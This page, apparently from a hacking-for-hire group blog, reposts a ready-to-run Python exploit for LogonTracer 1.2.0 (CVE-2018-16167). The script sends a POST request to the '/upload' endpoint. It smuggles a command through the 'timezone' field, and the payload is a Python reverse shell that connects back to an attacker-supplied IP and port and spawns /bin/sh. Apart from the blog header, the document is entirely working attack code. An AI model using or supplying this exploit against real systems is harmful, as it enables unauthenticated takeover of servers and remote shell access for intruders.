Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863544153

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
# Date: 29/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.jpcert.or.jp/
# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
# Version: 1.2.0 and earlier
# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
# CVE : CVE-2018-16167

import requests
import argparse

parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
parser.add_argument('aip', type=str, help='Attacker ip')
parser.add_argument('aport', type=str, help='Attacker port')
parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')

args = parser.parse_args()

ATTACKER_IP = args.aip
ATTACKER_PORT = args.aport
PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"

VICTIM_URL = args.victimurl
VICTIM_ENDPOINT = "/upload"

DATA = {
    "logtype": "XML",
    "timezone": f"1;{PAYLOAD};",
}

print("[!] Sending request... If your terminal hangs, you might have a shell!")
requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)
print("[*] Done. Did you get what you wanted?")